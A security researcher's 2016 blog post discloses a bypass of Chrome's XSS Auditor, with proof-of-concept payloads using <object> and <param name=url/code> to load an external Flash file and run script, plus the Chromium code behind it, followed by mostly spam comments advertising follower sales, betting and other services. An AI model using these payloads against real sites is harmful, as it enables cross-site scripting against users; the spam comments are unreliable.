Tuesday, December 27, 2016

XSS Auditor bypass using obscure <param> tag

Hi there!
I just found an XSS Auditor bypass by accident when I read Chromium's code for the another reason.
In this short post, I'd like to share this bypass. I confirmed that it works on Chrome Canary 57.
I have already reported here: https://bugs.chromium.org/p/chromium/issues/detail?id=676992

The bypass is:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
<object allowscriptaccess=always>
<param name=url value=https://l0.cm/xss.swf>
Also it works:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=code%20value=https://l0.cm/xss.swf%3E
<object allowscriptaccess=always>
<param name=code value=https://l0.cm/xss.swf>
I didn't know that Chrome supports such params until I found it in the HTMLObjectElement.cpp:
if (url.isEmpty() && urlParameter.isEmpty() &&
    (equalIgnoringCase(name, "src") || equalIgnoringCase(name, "movie") ||
     equalIgnoringCase(name, "code") || equalIgnoringCase(name, "url")))
  urlParameter = stripLeadingAndTrailingHTMLSpaces(p->value());
The <param name="src" value="//attacker/xss.swf"> and <param name="movie" value="//attacker/xss.swf"> are blocked by XSS Auditor. But I noticed that code and url are not blocked. Using this, we can load Flash and execute the JavaScript. According to the source code's comment, it seems Chrome supports this for compatibility. But at least I confirmed it does not work on IE/Edge and Firefox. I think Chrome can remove this support :)

That's it. I wrote about XSS Auditor bypass using <param>. Thanks for reading!
Posted by at
Labels: , , , ,

21 comments:

  1. AnonymousJanuary 25, 2019 at 7:03 AM

    To do Not Pressure OR Anything, But Have Ever This considered post there is statement PT Lampung Service this is a
    Service HP Bandar Lampung whose looking to do day
    Service iPhone Lampung to this looking then to that is
    Jasa Kursus Service HP I will try it.
    Jasa Kursus Service HP They have jumping places and so that the device other kid's activity.Youtuber Lampung , Thanks ! Visit Back.

    ReplyDelete
  2. HuongkvFebruary 24, 2021 at 12:15 AM

    Aivivu chuyên vé máy bay, tham khảo

    vé máy bay đi Mỹ hạng thương gia

    mua vé máy bay từ mỹ về việt nam hãng eva

    gia ve may bay vietjet tu han quoc ve viet nam

    giá vé máy bay từ Toronto đến việt nam

    khi nào có chuyến bay từ nhật về việt nam

    ReplyDelete
  3. Takipçi Satın AlJune 30, 2021 at 6:41 AM

    En hızlı instagram takipçi satın al
    En uygun instagram takipçi satın al
    En telafili instagram takipçi satın al
    En gerçek spotify takipçi satın al
    En ucuz instagram takipçi satın al
    En otomatik instagram takipçi satın al
    En sistematik tiktok takipçi satın al
    En otantik instagram takipçi satın al
    En opsiyonel instagram takipçi satın al
    En güçlü instagram takipçi satın al
    En kuvvetli instagram takipçi satın al
    En seri instagram takipçi satın al
    En akıcı instagram takipçi satın al
    En akıcı takipçi satın al
    En akıcı instagram takip etmeyenler

    ReplyDelete
  4. takipcimJuly 2, 2021 at 11:54 AM

    takipçi satın al

    ReplyDelete
  5. takipcimJuly 3, 2021 at 7:06 AM

    En iyi bahis siteleri bahis siteleri
    canlı bahis canlı bahis siteleri
    güvenilir bahis güvenilir bahis siteleri
    tiktok izlenme satın altiktok izlenme satın al
    takipçi satın al takipci satın al
    instagram izlenme instagram izlenme satın al
    tiktok takipçi satın al tiktok takipçi satın al
    instagram begeni satın al
    takipci satın al

    ReplyDelete
  6. kartal moto kuryeJuly 12, 2021 at 11:10 AM

    İstanbul moto kurye

    ReplyDelete
  7. My SiteOctober 24, 2021 at 7:27 AM

    However I wish to say that this write-up very compelled me to take a look at and do it! Your writing taste has been surprised me. Thank you
    경마
    온라인경마

    ReplyDelete
  8. Dim4ksanNovember 12, 2021 at 9:08 AM

    Most individuals all over the globe desire to start a warm and loving family, and ukrainian brides are those ladies who are willing to marry a foreigner. To start a discussion with these females, you must first tell them everything about yourself. After you've completed all of this, you may begin hunting for the same woman. In my experience, you can totally trust these people because I've been in contact with a female I'm interested in for over a year owing to them.

    ReplyDelete
  9. ufabet1688February 1, 2022 at 9:58 AM

    These are in fact wonderful ideas in concerning blogging. You have touched some good factors here. Any way keep up wrinting. วิธีสมัคร ufabet

    ReplyDelete
  10. moneyMarch 9, 2022 at 10:20 PM

    I think your website has a lot of useful knowledge. I'm so thankful for this website.
    I hope that you continue to share a lot of knowledge.
    This is my website.
    넷파블머니상

    ReplyDelete
  11. Andre Van den bergMarch 24, 2022 at 4:11 AM

    This is new knowledge for me, I am excited about it. thanks....tourist visa India, You can get an online tourist visa for India and visit the beautiful religious places of India etc.

    ReplyDelete
  12. AlbertApril 25, 2022 at 2:29 AM

    Good afternoon sir and your blog is great. Many people ask, India business visa requirements, you can see on my blog that all requirements related to business visa are available here.

    ReplyDelete
  13. Fore SecurityMay 12, 2022 at 8:05 AM

    There are a lot of commercial security alarm companies out there, and it can be tough to know which one to choose. commercial security alarm companies

    ReplyDelete
  14. Snozone UKMay 13, 2022 at 11:23 AM

    Meeting rooms are situated away from the public areas, available day and evening, with or without private dining. If your itinerary allows it, slope based activities can be arranged which include effective teambuilding exercises created and led by our snow sports team. Your package can even include teaching your group a brand new sport! Meeting Rooms Yorkshire

    ReplyDelete
  15. hahahaJune 5, 2022 at 2:02 AM

    Which is some inspirational stuff. Never knew that opinions might be this varied. Thank you for all the enthusiasm to provide such helpful information here.바카라사이트 It helped me a lot. If you have time, I hope you come to my site and share your opinions. Have a nice day.
    dsyyyt

    ReplyDelete
  16. Blissful UniverseSeptember 17, 2022 at 8:37 AM

    안전하게 에볼 플레이 먹튀검증 gogo

    ReplyDelete
  17. 먹튀검증September 25, 2022 at 11:50 PM

    Je n'ai aucun mot pour apprécier ce post…..Je suis vraiment impressionné par ce post.La personne qui a créé ce poste était un grand humain.Merci de nous l'avoir fait savoir. 먹튀검증

    ReplyDelete
  18. Angel17April 20, 2023 at 1:07 AM

    I love reading your blog because, you provide very informative blog post.
    www.google.com/maps?cid=4488280802242044319

    ReplyDelete
  19. Crypto Tech NextApril 28, 2023 at 1:32 AM

    Coinbase wallet can be used to store the crypto tokens that you buy from the Coinbase exchange. But do so, you are asked to link your wallet with the Coinbase exchange account. The process to add a Coinbase Wallet Login is quite clear. All you need to do is, access your wallet and visit the settings of your account. For more information visit :

    Coinbase Wallet $ Coinbase Wallet Extension $ Qantas Airlines $ Qantas flights

    ReplyDelete
  20. RonaldoMay 9, 2023 at 8:55 AM

    thank you for sharing this post! you done great effort
    truck driver accidents

    ReplyDelete
  21. AnyanyoJune 16, 2024 at 12:44 AM

    It may be tempting to save money by repairing the door yourself, but in the long run, hiring a professional is the better choice. I tried to fix it myself and now I need to fix it more than before! Atlas Door Repair

    ReplyDelete

Subscribe to: Post Comments (Atom)